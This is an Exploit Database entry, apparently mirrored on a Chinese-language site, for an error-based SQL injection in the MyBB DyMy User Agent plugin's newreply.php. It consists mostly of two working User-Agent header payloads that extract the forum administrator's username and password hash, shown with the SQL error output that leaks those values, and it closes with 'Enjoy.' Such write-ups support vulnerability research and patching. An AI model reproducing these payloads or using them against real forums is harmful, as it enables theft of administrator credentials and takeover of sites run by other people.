MyBB DyMy User Agent Plugin – ‘newreply.php’ SQL Injection

• Exploit Database
• 10 阅读

• 作者： JoinSe7en
  日期： 2012-12-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/23359/

• ############################################################################
  # Exploit title : MyBB DyMy User Agent Plugin SQL injection vulnerability. #
  # Author: JoinSe7en#
  # Date : 13 Dec 2012 #
  # Tested on : Linux#
  # Category : Web Applications#
  # Software Link : http://mods.mybb.com/view/dymy-user-agent#
  ############################################################################
  
  
  [*] PoC (receive admin username)
  
  We fire up HTTP Live Headers or a similar tool, post something and press 'replay'.
  We then replace our user agent with the following Query:
  
  POST http://localhost/mybb/newreply.php?ajax=1
  
  HTTP Headers:
  Host: localhost
  User-Agent: ' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); #
  
  Output:
  
  SQL Error:
  1062 - Duplicate entry 'admin1' for key 'group_key'
  
  +------------------------------------------------------------------+
  
  [*] PoC (receive admin password)
  
  We then replace our user agent with the following Query:
  
  POST http://localhost/mybb/newreply.php?ajax=1
  
  HTTP Headers:
  Host: localhost
  User-Agent: ' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); #
  
  Output:
  SQL Error:
  1062 - Duplicate entry '098f6bcd4621d373cade4e832627b4f6' for key 'group_key'
  
  +------------------------------------------------------------------+
  
  
  Enjoy.